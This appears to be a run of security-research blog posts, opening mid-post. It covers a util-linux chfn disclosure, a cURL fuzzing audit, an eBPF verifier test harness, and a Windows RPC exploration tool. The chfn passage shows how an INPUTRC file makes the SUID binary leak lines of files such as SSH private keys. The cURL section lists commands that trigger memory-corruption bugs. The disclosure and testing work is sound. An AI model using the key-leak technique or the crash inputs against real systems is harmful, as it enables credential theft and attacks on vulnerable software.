    $ INPUTRC=test chfn
    Changing finger information for user.
    readline: test: line 1: `:AAAAA: invalid key binding: missing key sequence
    Office [test]: ^C
  3. We can leak a line that does not contain a space, a tab, or a colon (or nulls):
    for (; (c = string[i]) && c != ':' && c != ' ' && c != '\t'; i++ );
    // ...
    foundsep = c != 0;
    // ...
    if (foundsep == 0) {
       _rl_init_file_error ("%s: no key sequence terminator", string);
       return 1;
    $ cat test
    $ INPUTRC=test chfn
    Changing finger information for user.
    readline: test: line 1: AAAAA: no key sequence terminator
    Office [test]: ^C

Happily, SSH keys match this third path, so we can stop here. Well, the juicy bits match, anyway—all the key data is typically Base64-encoded in a PEM container. We can also use this bug to read anything else that’s inside a PEM container, such as certificate files; or just base64 encoded, such as wireguard keys.


The bug was introduced in version 2.30-rc1 in 2017, which would make the bug old enough to hit LTS releases. However; Debian, Red Hat and Ubuntu have chfn provided by a different package, so are unaffected. In the default configuration on Red Hat, /etc/login.defs doesn’t contain CHFN_RESTRICT. This omission would prevent util-linux/chfn from changing any user information, which would also kill the bug. Neither CentOS or Fedora seem to have chfn installed by default in my testing, either.

Outside of chfn, then, how impactful is this? readline is quite well known, but our interest here is its use in SUID binaries. Running ldd on every SUID on my Arch box shows that the library is used only by chfn... How can we quickly determine a wider impact?

I first thought of scanning the package repositories, but unfortunately none of the web interfaces to the Debian, Ubuntu, Fedora, CentOS or Arch package repos provide file modes... This means we don’t have enough information to determine whether any binaries in a given package are SUID.

Sooo I mirrored the Debian and Arch repos for x86_64 and checked them by hand, assisted by some terrible shell scripts. The gist of that endeavor is that Arch is the only distro that has a package (util-linux) that contains a SUID executable (chfn) which loads readline by default. Oh well!

Side note: I totally fumbled reporting the CVE for this, so my name isn’t listed against the CVE with MITRE... RIP my career.

Don’t use readline in SUID applications

This was pretty much the result of an email chain sent to the Arch and Red Hat security teams, and to the package maintainer, who went ahead and removed readline support from chfn. The bug got patched like a year ago, so hopefully most affected users have updated by now.

Homework: go have a look at how many SUIDs use ncurses— atop on macOS, at least—and try messing with the TERMINFO environment variable... Let me know if you find anything :^)


Thank you to Karel Zak, and both of the Arch and Red Hat Security teams, who were all very helpful and expedient in rolling out fixes. Thank you also to disconnect3d for help and advice.


  • May 2, 2017: Bug introduced
  • December 31, 2020: g l o b a l     t i m e l i n e     r e s e t
  • February 8, 2022: Reported the bug to Arch and util-linux upstream
  • February 14, 2022: Bug fixed in util-linux upstream
  • March 28, 2022: Blog post about the discovery of the bug drafted
  • May 12, 2022: Blog post published internally
  • May 2022-Feb 2023: Procrastination^H Allowing time for updates to roll out
  • February 16, 2023: Blog post published


cURL audit: How a joke led to significant findings

By Maciej Domanski

In fall 2022, Trail of Bits audited cURL, a widely-used command-line utility that transfers data between a server and supports various protocols. The project coincided with a Trail of Bits maker week, which meant that we had more manpower than we usually do, allowing us to take a nonstandard approach to the audit.

While discussing the threat model of the application, one of our team members jokingly asked, “Have we tried curl AAAAAAAAAA… yet”? Although the comment was made in jest, it sparked an idea: we should fuzz cURL’s command-line interface (CLI). Once we did so, the fuzzer quickly uncovered memory corruption bugs, specifically use-after-free issues, double-free issues, and memory leaks. Because the bugs are in libcurl, a cURL development library, they have the potential to affect the many software applications that use libcurl. This blog post describes how we found the following vulnerabilities:

Working with cURL

cURL is continuously fuzzed by the OSS-Fuzz project, and its harnesses are developed in the separate curl-fuzzer GitHub repository. When I consulted the curl-fuzzer repository to check out the current state of cURL fuzzing, I noticed that cURL’s command-line interface (CLI) arguments are not fuzzed. With that in mind, I decided to focus on testing cURL’s handling of arguments. I used the AFL++ fuzzer (a fork of AFL) to generate a large amount of random input data for cURL’s CLI. I compiled cURL using collision-free instrumentation at link time with AddressSanitizer and then analyzed crashes that could indicate a bug.

cURL obtains its options through command-line arguments. As cURL follows the C89 standard, the main() function of a program can be defined with no parameters or with two parameters (argc and argv). The argc argument represents the number of command-line arguments passed to the program (which includes the program’s name). The argv argument is an array of pointers to the arguments passed to the program from the command line.

The standard also states that in a hosted environment, the main() function takes a third argument, char *envp[]; this argument points to a null-terminated array of pointers to char, each of which points to a string with information about the program’s environment.

The three parameters can have any name, as they are local to the function in which they are declared.

cURL’s main() function in the curl/src/tool_main.c file passes the command-line arguments to the operate() function, which parses them and sets up the global configuration of cURL. cURL then uses that global configuration to execute the operations.

Figure 1.1: cURL’s main() function (curl/src/tool_main.c#236–288)

Fuzzing argv

When I started the process of attempting to fuzz cURL, I looked for a way to use AFL to fuzz its argument parsing. My search led me to a quote from the creator of AFL (Michal Zalewski):

“AFL doesn’t support argv fuzzing because TBH, it’s just not horribly useful in practice. There is an example in experimental/argv_fuzzing/ showing how to do it in a general case if you really want to.”

I looked at that experimental AFL feature and its equivalent in AFL++. The argv fuzzing feature makes it possible to fuzz arguments passed to a program from the CLI, instead of through standard input. That can be useful when you want to cover multiple APIs of a library in fuzz testing, as you can fuzz the arguments of a tool that uses the library rather than writing multiple fuzz tests for each API.

How does the AFL++ argvfuzz feature work?

The argv-fuzz-inl.h header file of argvfuzz defines two macros that take input from the fuzzer and set up argv and argc:

  • The AFL_INIT_ARGV() macro initializes the argv array with the arguments passed to the program from the command line. It then reads the arguments from standard input and puts them in the argv array. The array is terminated by two NULL characters, and any empty parameter is encoded as a lone 0x02 character.
  • The AFL_INIT_SET0(_p) macro is similar to AFL_INIT_ARGV() but also sets the first element of the argv array to the value passed to it. This macro can be useful if you want to preserve the program’s name in the argv array.

Both macros rely on the afl_init_argv() function, which is responsible for reading a command line from standard input (by using the read() function in the unistd.h header file) and splitting it into arguments. The function then stores the resulting array of strings in a static buffer and returns a pointer to that buffer. It also sets the value pointed to by the argc argument to the number of arguments that were read.

To use the argv-fuzz feature, you need to include the argv-fuzz-inl.h header file in the file that contains the main() function and add a call to either AFL_INIT_ARGV or AFL_INIT_SET0 at the beginning of main(), as shown below:


Preparing a dictionary

A fuzzing dictionary file specifies the data elements that a fuzzing engine should focus on during testing. The fuzzing engine adjusts its mutation strategies so that it will process the tokens in the dictionary. In the case of cURL fuzzing, a fuzzing dictionary can help afl-fuzz more effectively generate valid test cases that contain options (which start with one or two dashes).

To fuzz cURL, I used the afl-clang-lto compiler’s autodictionary feature, which automatically generates a dictionary during compilation of the target binary. This dictionary is transferred to afl-fuzz on startup, improving its coverage. I also prepared a custom dictionary based on the cURL manpage and passed it to afl-fuzz via the -x parameter. I used the following Bash command to prepare the dictionary:

$ man curl | grep -oP '^\s*(--|-)\K\S+' | sed 's/[,.]$//' | sed 's/^/"&/; s/$/&"/'  | sort -u > curl.dict

Setting up a service for cURL connections

Initially, my focus was solely on CLI fuzzing. Still, I had to consider that each valid cURL command generated by the fuzzer would likely result in a connection to a remote service. To avoid connecting to those services but maintain the ability to test the code responsible for handling connections, I used the netcat tool as a simulation of remote service. First, I configured my machine to redirect outgoing traffic to netcat’s listening port.

I used the following command to run netcat in the background:

$ netcat -l 80 -k -w 0 &

The parameters indicate that the service should listen for incoming connections on port 80 (-l 80), continue to listen for additional connections after the current one is closed (-k), and immediately terminate the connection once it has been established (-w 0).

cURL is expected to connect to services using various hostnames, IP addresses, and ports. I needed to forward them to one place: a previously created TCP port 80.

To redirect all outgoing TCP packets to the local loopback address ( on port 80, I used the following iptables rule:

$ iptables -t nat -A OUTPUT -p tcp -j REDIRECT --to-port 80

The command adds a new entry to the network address translation table in iptables. The -p option specifies the protocol (in this case, TCP), and the -j option specifies the rule’s target (in this case, REDIRECT). The --to-port option specifies the port to which the packets will be redirected (in this case, 80).

To ensure that all domain names would be resolved to IP address, I used the following iptables rule:

$ iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT --to-destination

This rule adds a new entry to the NAT table, specifying the protocol (-p) as UDP, the destination port (--dport) as 53 (the default port for DNS), and the target (-j) as destination NAT. The --to-destination option specifies the address to which the packets will be redirected (in this case,

The abovementioned setup ensures that every cURL connection is directed to the address

Results analysis

The fuzzing process ran for a month on a 32-core machine with an Intel Xeon Platinum 8280 CPU @ 2.70GHz. The following bugs were identified during that time, most of them in the first few hours of fuzzing:

CVE-2022-42915 (Double free when using HTTP proxy with specific protocols)

Using cURL with proxy connection and dict, gopher, LDAP, or telnet protocol triggers a double-free vulnerability due to flaws in the error/cleanup handling. This issue is fixed in cURL 7.86.0.

To reproduce the bug, use the following command:

$ curl -x 0:80 dict://0

CVE-2022-43552 (Use after free when HTTP proxy denies tunneling SMB/TELNET protocols)

cURL can virtually tunnel supported protocols through an HTTP proxy. If an HTTP proxy blocks SMB or TELNET protocols, cURL may use a struct that has already been freed in its transfer shutdown code. This issue is fixed in cURL 7.87.0.

To reproduce the bug, use the following commands:

$ curl 0 -x0:80 telnet:/[j-u][j-u]//0 -m 01
$ curl 0 -x0:80 smb:/[j-u][j-u]//0 -m 01

TOB-CURL-10 (Use after free while using parallel option and sequences)

A use-after-free vulnerability can be triggered by using cURL with the parallel option (-Z), an unmatched bracket, and two consecutive sequences that create 51 hosts. cURL allocates memory blocks for error buffers, allowing up to 50 transfers by default. In the function responsible for handling errors, errors are copied to the appropriate error buffer when connections fail, and the memory is then freed. For the last (51) sequence, a memory buffer is allocated, freed, and an error is copied to the previously freed memory buffer. This issue is fixed in cURL 7.86.0.

To reproduce the bug, use the following command:

$ curl 0 -Z [q-u][u-~] }

TOB-CURL-11 (Unused memory blocks are not freed, resulting in memory leaks)

cURL allocates blocks of memory that are not freed when they are no longer needed, leading to memory leaks. This issue is fixed in cURL 7.87.0.

To reproduce the bug, use the following commands:

$ curl 0 -Z 0 -Tz 0
$ curl 00 --cu 00
$ curl --proto =0 --proto =0


If you want to learn about the full process of setting up a fuzzing harness and immediately begin fuzzing cURL’s CLI arguments, we have prepared a Dockerfile for you:

# syntax=docker/dockerfile:1
FROM aflplusplus/aflplusplus:4.05c

RUN apt-get update && apt-get install -y libssl-dev netcat iptables groff

# Clone a curl repository
RUN git clone && cd curl && git checkout 2ca0530a4d4bd1e1ccb9c876e954d8dc9a87da4a

# Apply a patch to use afl++ argv fuzzing feature
COPY <<-EOT /AFLplusplus/curl/curl_argv_fuzz.patch
		diff --git a/src/tool_main.c b/src/tool_main.c
		--- a/src/tool_main.c
		+++ b/src/tool_main.c
		@@ -54,6 +54,7 @@
		 #include "tool_vms.h"
		 #include "tool_main.h"
		 #include "tool_libinfo.h"
		+#include "../../AFLplusplus/utils/argv_fuzzing/argv-fuzz-inl.h"

		  * This is low-level hard-hacking memory leak tracking and similar. Using
		@@ -246,6 +247,8 @@ int main(int argc, char *argv[])
		   struct GlobalConfig global;
		   memset(&global, 0, sizeof(global));

		 #ifdef WIN32
		   /* Undocumented diagnostic option to list the full paths of all loaded
		      modules. This is purposely pre-init. */

# Apply a patch to use afl++ argv fuzzing feature
RUN cd curl && git apply curl_argv_fuzz.patch

# Compile a curl using collision-free instrumentation at link time and ASAN
RUN cd curl && \
	autoreconf -i && \
	CC="afl-clang-lto" CFLAGS="-fsanitize=address -g" ./configure --with-openssl --disable-shared && \
	make -j $(nproc) && \
	make install

# Download a dictionary
RUN wget

	# Running a netcat listener on port tcp port 80 in the background
	netcat -l 80 -k -w 0 &

	# Prepare iptables entries
	iptables-legacy -t nat -A OUTPUT -p tcp -j REDIRECT --to-port 80
	iptables-legacy -t nat -A OUTPUT -p udp --dport 53 -j DNAT --to-destination

	# Prepare fuzzing directories
	mkdir fuzz &&
		  cd fuzz &&
		  mkdir in out &&
		  echo -ne 'curl\x00http://' > in/example_command.txt &&
		  # Run afl++ fuzzer
		  afl-fuzz -x /AFLplusplus/curl.dict -i in/ -o out/ -- curl

RUN chmod +x ./

Use the following commands to run this file:

$ docker buildx build -t curl_fuzz .
$ docker run --rm -it --cap-add=NET_ADMIN curl_fuzz

All joking aside

In summary, our approach demonstrates that fuzzing CLI can be an effective supplementary technique for identifying vulnerabilities in software. Despite initial skepticism, our results yielded valuable insights. We believe this has improved the security of CLI-based tools, even when OSS-Fuzz has been used for many years.

It is possible to find a heap-based memory corruption vulnerability in the cURL cleanup process. However, use-after-free vulnerability may not be exploitable unless the freed data is used in the appropriate way and the data content is controlled. A double-free vulnerability would require further allocations of similar size and control over the stored data. Additionally, because the vulnerability is in libcurl, it can impact many different software applications that use libcurl in various ways, such as sending multiple requests or setting and cleaning up library resources within a single process.

It is also worth noting that although the attack surface for CLI exploitation is relatively limited, if an affected tool is a SUID binary, exploitation can result in privilege escalation (see CVE-2021-3156: Heap-Based Buffer Overflow in sudo).

To enhance the efficiency of fuzz testing similar tools in the future, we have extended the argv_fuzz feature in AFL++ by incorporating a persistent fuzzing mode. Learn more about it here.

Finally, our cURL audit reports are public. Check the audit report and the threat model.

Harnessing the eBPF Verifier

By Laura Bauman

During my internship at Trail of Bits, I prototyped a harness that improves the testability of the eBPF verifier, simplifying the testing of eBPF programs. My eBPF harness runs in user space, independently of any locally running kernel, and thus opens the door to testing of eBPF programs across different kernel versions.

eBPF enables users to instrument a running system by loading small programs into the operating system kernel. As a safety measure, the kernel “verifies” eBPF programs at load time and rejects any that it deems unsafe. However, using eBPF is a CI / CD nightmare, because there’s no way to know whether a given eBPF program will successfully load and pass verification without testing it on a running kernel.

My harness aims to eliminate that nightmare by executing the eBPF verifier outside of the running kernel. To use the harness, a developer tweaks my libbpf-based sample programs (hello.bpf.c and hello_loader.c) to tailor them to the eBPF program being tested. The version of libbpf provided by my harness links against a “kernel library” that implements the actual bpf syscall, which provides isolation from the running kernel. The harness works well with kernel version 5.18, but it is still a proof of concept; enabling support for other kernel versions and additional eBPF program features will require a significant amount of work.

With great power comes great responsibility

eBPF is an increasingly powerful technology that is used to increase system observability, implement security policies, and perform advanced networking operations. For example, the osquery open-source endpoint agent uses eBPF for security monitoring, to enable organizations to watch process and file events happening across their fleets.

The ability to inject eBPF code into the running kernel seems like either a revelation or a huge risk to the kernel’s security, integrity, and dependability. But how on earth is it safe to load user-provided code into the kernel and execute it there? The answer to this question is twofold. First, eBPF isn’t “normal” code, and it doesn’t execute in the same way as normal code. Second, eBPF code is algorithmically “verified” to be safe to execute.

eBPF isn’t normal code

eBPF (extended Berkeley Packet Filter) is an overloaded term that refers to both a specialized bytecode representation of programs and the in-kernel VM that runs those bytecode programs. eBPF is an extension of classic BPF, which has fewer features than eBPF (e.g., two registers instead of ten), uses an in-kernel interpreter instead of a just-in-time compiler, and focuses only on network packet filtering.

User applications can load eBPF code into kernel space and run it there without modifying the kernel’s source code or loading kernel modules. Loaded eBPF code is checked by the kernel’s eBPF verifier, which tries to prove that the code will terminate without crashing.

The picture above shows the general interaction between user space and kernel space, which occurs through the bpf syscall. The eBPF program is represented in eBPF bytecode, which can be obtained through the Clang back end. The interaction begins when a user space process executes the first in the series of bpf syscalls used to load an eBPF program into the kernel. The kernel then runs the verifier, which enforces constraints that ensure the eBPF program is valid (more on that later). If the verifier approves the program, the verifier will finalize the process of loading it into the kernel, and it will run when it is triggered. The program will then serve as a socket filter, listening on a socket and forwarding only information that passes the filter to user space.

Verifying eBPF

The key to eBPF safety is the eBPF verifier, which limits the set of valid eBPF programs to those that it can guarantee will not harm the kernel or cause other issues. This means that eBPF is, by design, not Turing-complete.

Over time, the set of eBPF programs accepted by the verifier has expanded, though the testability of that set of programs has not. The following quote from the “BPF Design Q&A” section of the Linux kernel documentation is telling:

The [eBPF] verifier is steadily getting ‘smarter.’ The limits are being removed. The only way to know that the program is going to be accepted by the verifier is to try to load it. The BPF development process guarantees that the future kernel versions will accept all BPF programs that were accepted by the earlier versions.

This “development process” relies on a limited set of regression tests that can be run through the kselftest system. These tests require that the version of the source match that of the running kernel and are aimed at kernel developers; the barrier to entry for others seeking to run or modify such tests is high. As eBPF is increasingly relied upon for critical observability and security infrastructure, it is concerning that the Linux kernel eBPF verifier is a single point of failure that is fundamentally difficult to test.

Trust but verify

The main problem facing eBPF is portability—that is, it is notoriously difficult to write an eBPF program that will pass the verifier and work correctly on all kernel versions (or, heck, on even one). The introduction of BPF Compile Once-Run Everywhere (CO-RE) has significantly improved eBPF program portability, though issues still remain. BPF CO-RE relies on the eBPF loader library (libbpf), the Clang compiler, and the eBPF Type Format (BTF) information in the kernel. In short, BPF CO-RE means that an eBPF program can be compiled on one Linux kernel version (e.g., by Clang), modified to match the configuration of another kernel version, and loaded into a kernel of that version (through libbpf) as though the eBPF bytecode had been compiled for it.

However, different kernel versions have different verifier limits and support different eBPF opcodes. This makes it difficult (from an engineering perspective) to tell whether a particular eBPF program will run on a kernel version other than the one it has been tested on. Moreover, different configurations of the same kernel version will also have different verifier behavior, so determining a program’s portability requires testing the program on all desired configurations. This is not practical when building CI infrastructure or trying to ship a production piece of software.

Projects that use eBPF take a variety of approaches to overcoming its portability challenges. For projects that primarily focus on tracing syscalls (like osquery and opensnoop), BPF CO-RE is less necessary, since syscall arguments are stable between kernel versions. In those cases, the limiting factor is the variations in verifier behavior. Osquery chooses to place strict constraints on its eBPF programs; it does not take advantage of modern eBPF verifier support for structures such as bounded loops and instead continues to write eBPF programs that would be accepted by the earliest verifiers. Other projects, such as SysmonForLinux, maintain multiple versions of eBPF programs for different kernel versions and choose a program version dynamically, during compilation.

What is the eBPF verifier?

One of the key benefits of eBPF is the guarantee it provides: that the loaded code will not crash the kernel, will terminate within a time limit, and will not leak information to unprivileged user processes. To ensure that code can be injected into the kernel safely and effectively, the Linux kernel’s eBPF verifier places restrictions on the abilities of eBPF programs. The name of the verifier is slightly misleading, because although it aims to enforce restrictions, it does not perform formal verification.

The verifier performs two main passes over the code. The first pass is handled by the check_cfg() function, which ensures that the program is guaranteed to terminate by performing an iterative depth-first search of all possible execution paths. The second pass (done in the do_check() function) involves static analysis of the bytecode; this pass ensures that all memory accesses are valid, that types are used consistently (e.g., scalar values are never used as pointers), and that the number of branches and total instructions is within certain complexity limits.

As mentioned earlier in the post, the constraints that the verifier enforces have changed over time. For example, eBPF programs were limited to a maximum of 4,096 instructions until kernel version 5.2, which increased that number to 1 million. Kernel version 5.3 introduced the ability for eBPF programs to use bounded loops. Note, though, that the verifier will always be backward compatible in that all future versions of the verifier will accept any eBPF program accepted by older versions of the verifier.

Alarmingly, the ability to load eBPF programs into the kernel is not always restricted to root users or processes with the CAP_SYS_ADMIN capability. In fact, the initial plan for eBPF included support for unprivileged users, requiring the verifier to disallow the sharing of kernel pointers with user programs and to perform constant blinding. In the wake of several privilege escalation vulnerabilities affecting eBPF, most Linux distributions have disabled support for unprivileged users by default. However, overriding the default still creates a risk of crippling privilege escalation attacks.

Regardless of whether eBPF is restricted to privileged users, flaws in the verifier cannot be tolerated if eBPF is to be relied upon for security-critical functionality. As explained in an article, at the end of the day, “[the verifier] is 2000 lines or so of moderately complex code that has been reviewed by a relatively small number of (highly capable) people. It is, in a real sense, an implementation of a blacklist of prohibited behaviors; for it to work as advertised, all possible attacks must have been thought of and effectively blocked. That is a relatively high bar.” While the code may have been reviewed by highly capable people, the verifier is still a complex bit of code embedded in the Linux kernel that lacks a cohesive testing framework. Without thorough testing, there is a risk that the backward compatibility principle could be violated or that entire classes of potentially insecure programs could be allowed through the verifier.

Enabling rigorous testing of the eBPF verifier

Given that the eBPF verifier is the foundation of critical infrastructure, it should be analyzed through a rigorous testing process that can be easily integrated into CI workflows. Kernel selftests and example eBPF programs that require a running Linux kernel for every kernel version are inadequate.

The eBPF verifier harness aims to allow testing on various kernel versions without any dependence on the locally running kernel version or configuration. In other words, the harness allows the verifier (the verifier.c file) to run in user space.

Compiling only a portion of the kernel source code for execution in user space is difficult because of the monolithic nature of the kernel and the kernel-specific idioms and functionality. Luckily, the task of eBPF verification is limited in scope, and many of the involved functions and files are consistent across kernel versions. Thus, stubbing out kernel-specific functions for user space alternatives makes it possible to run the verifier in isolation. For instance, because the verifier expects to be called from within a running kernel, it calls kernel-specific memory allocation functions when it is allocating memory. When it is run within the harness, it calls user space memory allocation functions instead.

The harness is not the first tool that aims to improve the verifier’s testability. The IO Visor Project’s BPF fuzzer has a very similar goal of running the verifier in user space and enabling efficient fuzzing—and the tool has found at least one bug. But there is one main difference between the eBPF harness and similar existing solutions: the harness is intended to support all kernel versions, making it easy to compare the same eBPF program across kernel versions. The harness leaves the true kernel functionality as intact as possible to maintain an execution environment that closely approximates a true kernel context.

System design

The harness consists of the following main components:

  • Linux source code (in the form of a Git submodule)
  • A LibBPF mirror (also a Git submodule)
  • header_stubs.h (which enables certain kernel functions and macros to be overridden or excluded altogether)
  • Harness source code (i.e., implementations of stubbed-out kernel functions)

The architecture of the eBPF verifier harness.

At a high level, the harness runs a sample eBPF program through the verifier by using standard libbpf conventions in sample.bpf.c and calling bpf_object__load() in sample_loader.c. The libbpf code runs as normal (e.g., probing the “kernel” to see what operations are supported, autocreating maps if configured to do so, etc.), but instead of invoking the actual bpf() syscall and trapping to the running kernel, it executes a harness “syscall” and continues running within the harnessed kernel.

Compiling a portion of the Linux kernel involves making a lot of decisions on which source files should be included and which should be stubbed out. For example, the kernel frequently calls the kmalloc() and kfree() functions for dynamic memory allocation. Because the verifier is running in user space, these functions can be replaced with user space versions like malloc() and free(). Kernel code also includes a lot of synchronization primitives that are not necessary in the harness, since the harness is a single-threaded application; those primitives can also safely be stubbed out.

Other kernel functionality is more difficult to efficiently replace. For example, getting the harness to work required finding a way to simulate the Linux kernel Virtual File System. This was necessary because the verifier is responsible for ensuring the safe use of eBPF maps, which are identified by file descriptors. To simulate operations on file descriptors, the harness must also be able to simulate the creation of files associated with the descriptors.

A demonstration

So how does the harness actually work? What do the sample programs look like? Below is a simple eBPF program that contains a bounded loop; verifier support for bounded loops was introduced in kernel version 5.3, so all kernel versions older than 5.3 should reject the program, and all versions newer than 5.3 should accept it. Let’s run it through the harness and see what happens!


#include "vmlinux.h"
#include <BPF/BPF_helpers.h>

int handle_tp(void *ctx)
    for (int i = 0; i < 3; i++) {
        BPF_printk("Hello World.\n");
    return 0;

char LICENSE[] SEC("license") = "Dual BSD/GPL";

Using the harness requires compiling each eBPF program into eBPF bytecode; once that’s done, a “loader” program calls the libbpf functions that handle the setup of the bpf syscalls. The loader program looks something like the program shown below, but it can be tweaked to allow for different configuration and setup options (e.g., to disable the autocreation of maps).


#include "bounded_loop.skel.h"

static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) {
    return vfprintf(stderr, format, args);

int load() {
  struct bounded_loop_bpf *obj;
  const struct bpf_insn *insns;
  int err = 0;


  obj = bounded_loop_bpf__open();
  if (!obj) {
    fprintf(stderr, "failed to open BPF object. \n");
    return 1;

  // this function invokes the verifier
  err = bpf_object__load(*obj->skeleton->obj);

  // free memory allocated by libbpf functions
  return err;

Compiling the sample program with the necessary portions of Linux source code, libbpf, and the harness runtime produces an executable that will run the verifier and report whether the program passes verification.

The output of bounded_loop.bpf.c when run through version 5.18 of the verifier.

Looking forward

The harness is still a proof of concept, and several aspects of it will need to be improved before it can be used in production. For instance, to fully support all eBPF map types, the harness will need the ability to fully stub out additional kernel-level memory allocation primitives. The harness will also need to reliably support all versions of the verifier between 3.15 and the latest version. Implementing that support will involve manually accounting for differences in the internal kernel application programming interfaces (APIs) between these versions and adjusting stubbed-out subsystems as necessary. Lastly, more cohesive organization of the stubbed-out functions, as well as thorough documentation on their organization, would make it much easier to distinguish between unmodified kernel code and functions that have been stubbed out with user space alternatives.

Because these issues will take a nontrivial amount of work, we invite the larger community to build upon the work we have released. While we have many ideas for improvements that will move the eBPF verifier closer to adoption, we believe there are others out there that could enhance this work with their own expertise. Although that initial work will enable rapid testing of all kernel versions once it’s complete, the harness will still need to be updated each time a kernel version is released to account for any internal changes.

However, the eBPF verifier is critical and complex infrastructure, and complexity is the enemy of security; when it is difficult to test complex code, it is difficult to feel confident in the security of that code. Thus, extracting the verifier into a testing harness is well worth the effort—though the amount of effort it requires should serve as a general reminder of the importance of testability.

Introducing RPC Investigator

A new tool for Windows RPC research

By Aaron LeMasters

Trail of Bits is releasing a new tool for exploring RPC clients and servers on Windows. RPC Investigator is a .NET application that builds on the NtApiDotNet platform for enumerating, decompiling/parsing and communicating with arbitrary RPC servers. We’ve added visualization and additional features that offer a new way to explore RPC.

RPC is an important communication mechanism in Windows, not only because of the flexibility and convenience it provides software developers but also because of the renowned attack surface its implementers afford to exploit developers. While there has been extensive research published related to RPC servers, interfaces, and protocols, we feel there’s always room for additional tooling to make it easier for security practitioners to explore and understand this prolific communication technology.

Below, we’ll cover some of the background research in this space, describe the features of RPC Investigator in more detail, and discuss future tool development.

If you prefer to go straight to the code, check out RPC Investigator on Github.


Microsoft Remote Procedure Call (MSRPC) is a prevalent communication mechanism that provides an extensible framework for defining server/client interfaces. MSRPC is involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file. For this reason alone, it has been a popular research target in both the defensive and offensive infosec communities for decades.

A few years ago, the developer of the open source .NET library NtApiDotNet, James Foreshaw, updated his library with functionality for decompiling, constructing clients for, and interacting with arbitrary RPC servers. In an excellent blog post—focusing on using the new NtApiDotNet functionality via powershell scripts and cmdlets in his NtObjectManager package—he included a small section on how to use the powershell scripts to generate C# code for an RPC client that would work with a given RPC server and then compile that code into a C# application.

We built on this concept in developing RPC Investigator (RPCI), a .NET/C# Windows Forms UI application that provides a visual interface into the existing core RPC capabilities of the NtApiDotNet platform:

  • Enumerating all active ALPC RPC servers
  • Parsing RPC servers from any PE file
  • Parsing RPC servers from processes and their loaded modules, including services
  • Integration of symbol servers
  • Exporting server definitions as serialized .NET objects for your own scripting

Beyond visualizing these core features, RPCI provides additional capabilities:

  • The Client Workbench allows you to create and execute an RPC client binary on the fly by right-clicking on an RPC server of interest. The workbench has a C# code editor pane that allows you to edit the client in real time and observe results from RPC procedures executed in your code.
  • Discovered RPC servers are organized into a library with a customizable search interface, allowing you to pivot RPC server data in useful ways, such as by searching through all RPC procedures for all servers for interesting routines.
  • The RPC Sniffer tool adds visibility into RPC-related Event Tracing for Windows (ETW) data to provide a near real-time view of active RPC calls. By combining ETW data with RPC server data from NtApiDotNet, we can build a more complete picture of ongoing RPC activity.


Disclaimer: Please exercise caution whenever interacting with system services. It is possible to corrupt the system state or cause a system crash if RPCI is not used correctly.

Prerequisites and System Requirements

Currently, RPCI requires the following:

By default, RPCI will automatically discover the Debugging Tools for Windows installation directory and configure itself to use the public Windows symbol server. You can modify these settings by clicking Edit -> Settings. In the Settings dialog, you can specify the path to the debugging tools DLL (dbghelp.dll) and customize the symbol server and local symbol directory if needed (for example, you can specify the path srv*c:\symbols*

If you want to observe the debug output that is written to the RPCI log, set the appropriate trace level in the Settings window. The RPCI log and all other related files are written to the current user’s application data folder, which is typically C:\Users\(user)\AppData\Roaming\RpcInvestigator. To view this folder, simply navigate to View -> Logs. However, we recommend disabling tracing to improve performance.

It’s important to note that the bitness of RPCI must match that of the system: if you run 32-bit RPCI on a 64-bit system, only RPC servers hosted in 32-bit processes or binaries will be accessible (which is most likely none).

Searching for RPC servers

The first thing you’ll want to do is find the RPC servers that are running on your system. The most straightforward way to do this is to query the RPC endpoint mapper, a persistent service provided by the operating system. Because most local RPC servers are actually ALPC servers, this query is exposed via the File -> All RPC ALPC Servers… menu item.

The discovered servers are listed in a table view according to the hosting process, as shown in the screenshot above. This table view is one starting point for navigating RPC servers in RPCI. Double-clicking a particular server will open another tab that lists all endpoints and their corresponding interface IDs. Double-clicking an endpoint will open another tab that lists all procedures that can be invoked on that endpoint’s interface. Right-clicking on an endpoint will open a context menu that presents other useful shortcuts, one of which is to create a new client to connect to this endpoint’s interface. We’ll describe that feature in a later section.

You can locate other RPC servers that are not running (or are not ALPC) by parsing the server’s image by selecting File -> Load from binary… and locating the image on disk, or by selecting File->Load from service… and selecting the service of interest (this will parse all servers in all modules loaded in the service process).

Exploring the Library

The other starting point for navigating RPC servers is to load the library view. The library is a file containing serialized .NET objects for every RPC server you have discovered while using RPCI. Simply select the menu item Library -> Servers to view all discovered RPC servers and Library -> Procedures to view all discovered procedures for all server interfaces. Both menu items will open in new tabs. To perform a quick keyword search in either tab, simply right-click on any row and type a search term into the textbox. The screenshot below shows a keyword search for “()” to quickly view procedures that have zero arguments, which are useful starting points for experimenting with an interface.

The first time you run RPCI, the library needs to be seeded. To do this, navigate to Library -> Refresh, and RPCI will attempt to parse RPC servers from all modules loaded in all processes that have a registered ALPC server. Note that this process could take quite a while and use several hundred megabytes of memory; this is because there are thousands of such modules, and during this process the binaries are re-mapped into memory and the public Microsoft symbol server is consulted. To make matters worse, the Dbghelp API is single-threaded and I suspect Microsoft’s public symbol server has rate-limiting logic.

You can periodically refresh the database to capture any new servers. The refresh operation will only add newly-discovered servers. If you need to rebuild the library from scratch (for example, because your symbols were wrong), you can either erase it using the menu item Library -> Erase or manually delete the database file (rpcserver.db) inside the current user’s roaming application data folder. Note that RPC servers that are discovered by using the File -> Load from binary… and File -> Load from service… menu items are automatically added to the library.

You can also export the entire library as text by selecting Library -> Export as Text.

Creating a New RPC Client

One of the most powerful features of RPCI is the ability to dynamically interact with an RPC server of interest that is actively running. This is accomplished by creating a new client in the Client Workbench window. To open the Client Workbench window, right-click on the server of interest from the library servers or procedures tab and select New Client.

The workbench window is organized into three panes:

  • Static RPC server information
  • A textbox containing dynamic client output
  • A tab control containing client code and procedures tabs

The client code tab contains C# source code for the RPC client that was generated by NtApiDotNet. The code has been modified to include a “Run” function, which is the “entry point” for the client. The procedures tab is a shortcut reference to the routines that are available in the selected RPC server interface, as the source code can be cumbersome to browse (something we are working to improve!).

The process for generating and running the client is simple:

  • Modify the “Run” function to call one or more of the procedures exposed on the RPC server interface; you can print the result if needed.
  • Click the “Run” button.
  • Observe any output produced by “Run”

In the screenshot above, I picked the “Host Network Service” RPC server because it exposes some procedures whose names imply interesting administrator capabilities. With a few function calls to the RPC endpoint, I was able to interact with the service to dump the name of what appears to be a default virtual network related to Azure container isolation.

